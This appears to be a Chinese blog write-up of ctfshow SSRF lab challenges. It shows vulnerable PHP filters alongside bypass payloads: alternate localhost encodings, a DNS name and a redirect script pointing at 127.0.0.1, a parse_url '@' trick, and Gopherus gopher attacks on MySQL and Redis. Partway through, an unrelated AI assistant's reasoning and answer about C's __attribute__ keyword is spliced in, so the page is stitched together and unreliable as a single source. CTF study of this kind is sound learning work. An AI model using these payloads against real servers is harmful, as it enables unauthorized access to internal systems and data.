ctfshow web入门 SSRF(超详解)

本文深入探讨了SSRF(Server-Side Request Forgery)攻击,这是一种利用服务端发起请求的安全漏洞,通常针对内部网络。通过多个示例代码展示了不同防御措施,如检查URL格式、过滤特定IP和域名,以及利用Gopher协议对无密码MySQL和Redis的攻击。同时,还介绍了如何通过payload规避限制,以及如何预防SSRF攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

https://ctf-wiki.org/web/ssrf/

https://www.freebuf.com/articles/web/260806.html

web351

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);//初始化 cURL 会话
curl_setopt($ch, CURLOPT_HEADER, 0);//启用时会将头文件的信息作为数据流输出。
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//将curl_exec()获取的信息以文件流的形式返回,而不是直接输出。
$result=curl_exec($ch);//执行 cURL 会话
curl_close($ch);//关闭 cURL 会话
echo ($result);
?>

ssrf就是利用我们可以访问到的服务器,对其服务器下面的内网进行探测,也可以理解为服务器拥有外网ip,而我们要访问的电脑则是在公网ip进行nat后分配的内网ip

payload:url=127.0.0.1/flag.php

web352

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);//解析一个 URL 并返回一个关联数组,包含在 URL 中出现的各种组成部分。
if($x['scheme']==='http'||$x['scheme']==='https'){//或
if(!preg_match('/localhost|127.0.0/')){//这里应该设置匹配的对象
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

image-20210908085752772

parse_url小结

payload:

url=http://0/flag.php
url=http://0.0.0.0/flag.php
url=http://0x7f.0.0.1/flag.php
url=http://0177.0.0.1/flag.php

web353

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

payload:

url=http://0/flag.php
url=http://127.1/flag.php
url=http://0x7f.0.0.1/flag.php
url=http://0177.0.0.1/flag.php

web354

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

payload:

奇淫巧技:将域名A类指向127.0.0.1
http(s)://sudo.cc/指向127.0.0.1

url=http://sudo.cc/flag.php

也可以
<?php header("Location: http://127.0.0.1/flag.php");
# POST: url=http://your-domain/ssrf.php

web355

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

多了一个限制让host位数小于5:

url=http://0/flag.php
url=http://127.1/flag.php

web356

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=3)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

小于3:url=http://0/flag.php

web357

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}


echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?>

filter_var — 使用特定的过滤器过滤一个变量

PHP FILTER_VALIDATE_IP 过滤器

image-20210908093219443

被保留ip地址同上

我的vps不在保留ip和私有ip范围内,所以在/var/www/html目录下写一个ssrf.php,就能绕过,之所以这么过滤,也算是预防ssrf的一个方式

<?php 
header("Location: http://127.0.0.1/flag.php");
?>

image-20210908093812779

web358

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}

要求以http://ctf.开头,以show结尾:url=http://ctf.@127.0.0.1/flag.php?show

parse_url小结

						 parse_url()  
						 
<?php
$url = 'http://username:password@hostname/path?arg=value#anchor';
print_r(parse_url($url));
echo parse_url($url, PHP_URL_PATH);
?>
结果----------------------------------------------------------------------------------------------------
Array
(
    [scheme] => http
    [host] => hostname			//
    [user] => username			@前
    [pass] => password			@前
    [path] => /path				/
    [query] => arg=value		?以后的key=value
    [fragment] => anchor		#以后的部分
)
	/path
<?php
$url = 'http://ctf.@127.0.0.1/flag.php?show';
$x = parse_url($url);
var_dump($x);
?>

//运行结果:
array(5) {
  ["scheme"]=>
  string(4) "http"
  ["host"]=>
  string(9) "127.0.0.1"
  ["user"]=>
  string(4) "ctf."
  ["path"]=>
  string(9) "/flag.php"
  ["query"]=>
  string(4) "show"
}

web359——Gopher协议打无密码的mysql

1.下载Gopherus:

git clone https://github.com/tarunkant/Gopherus.git

python gopherus.py

image-20210908155114746

2.将得到经过url编码的字符再编码一次image-20210908155938683

3.最后在check.php页面POST传参

image-20210908160203451

image-20210908160300221

去根目录下有flag.txt

web360——Gopher协议打redis

端口为6379同样操作就可以了😊,但是我把环境干废了i🙃

image-20210908164829918

<think>嗯,用户想了解C语言中的__attribute__关键字的使用说明和示例。首先,我需要回忆一下关于这个关键字的用法。记得__attribute__是GCC的扩展特性,主要用于给编译器提供额外的信息,比如优化结构体对齐、函数行为等。 首先,我应该解释__attribute__的基本概念,说明它是GCC特有的,可能影响可移植性。然后,分点列出常用的属性,比如packed、aligned、deprecated、format等,每个都要给出示例代码,这样用户更容易理解。 比如packed属性,可以用于结构体,取消对齐填充。示例代码中,用户提供的引用[1]里有一个结构体的例子,可以直接引用过来。接着是aligned,设置对齐方式,引用[3]中的例子可以用来说明如何指定结构体或类型的对齐字节数。 然后是deprecated属性,标记过时的函数或变量,提醒开发者不要使用。还有format属性,用于函数参数的格式检查,引用[4]中的printf样式检查的例子很合适,需要说明参数的位置和类型。 接下来,可能需要提到其他属性,比如unused,防止未使用变量的警告,以及section,将变量或函数放入指定段。这些也是常见的用法,但用户可能没有提到,需要补充。 注意事项部分,用户提供的引用[2]已经提到了可移植性问题、编译器依赖性和性能影响,这些需要强调,确保用户知道潜在的问题。 用户的问题中还要求生成相关问题,我需要考虑用户可能进一步想知道的内容,比如不同编译器的替代方案、对齐对性能的影响、实际应用场景,以及如何检测过时API的使用。这些问题能帮助用户深入理解。 需要注意的是,用户提供的引用中有多个例子,要正确标注引用标记,比如[^1]、[^2]等,确保引用来源正确。同时,代码示例要符合C语法,避免错误。例如,结构体定义中的packed位置是否正确,是否需要typedef等。 最后,确保回答结构清晰,分点说明,每个属性都有示例和解释,同时注意事项部分要突出,让用户明白使用时的限制和潜在问题。检查是否有遗漏的重要属性,或者是否有更常见的用法需要补充。例如,noreturn属性是否常用,是否需要提及?可能用户更关注基础用法,所以先集中在常用的几个属性上。</think>### C语言__attribute__关键字使用说明 `__attribute__`是GCC编译器特有的扩展特性,用于向编译器传递附加信息以优化代码或控制内存布局。以下是其常见用法及示例: --- #### 1. **内存对齐控制** - **`packed`属性**:取消结构体成员的内存对齐填充 ```c struct packed_struct __attribute__((packed)) { char a; // 1字节 int b; // 4字节(通常需要对齐到4字节边界,但packed取消对齐) }; // 总大小为5字节(默认编译环境可能为8字节) ``` 此属性常用于节省内存空间或处理网络协议数据包。 - **`aligned`属性**:强制指定对齐方式 ```c struct S __attribute__((aligned(8))) { short f[3]; // 每个short占2字节,共6字节 }; // 结构体按8字节对齐 typedef int more_aligned_int __attribute__((aligned(8))); // 类型强制8字节对齐 ``` 此属性适用于需要特定内存对齐的场景(如SIMD指令优化)[^3]。 --- #### 2. **函数行为控制** - **`deprecated`属性**:标记过时函数或变量 ```c void old_api() __attribute__((deprecated("改用new_api()"))); ``` 编译时会触发警告,提示开发者迁移到新接口[^2]。 - **`format`属性**:强制格式字符串检查 ```c void my_printf(const char *fmt, ...) __attribute__((format(printf, 1, 2))); ``` 编译器会校验参数与格式字符串的匹配性(类似`printf`)[^4]。 --- #### 3. **其他常用属性** - **`unused`属性**:抑制未使用变量的警告 ```c int __attribute__((unused)) debug_flag; // 标记变量可能未被使用 ``` - **`section`属性**:指定代码/数据存放的段 ```c int var __attribute__((section(".custom_section"))); // 变量存入自定义段 ``` --- #### 注意事项 1. **可移植性**:`__attribute__`为GCC扩展,其他编译器(如MSVC)可能不支持[^2]。 2. **性能权衡**:过度使用对齐属性可能导致内存浪费或缓存不友好。 3. **语法限制**:属性需紧跟在声明后,多属性用逗号分隔:`__attribute__((aligned(8), packed))` ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Yn8rt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值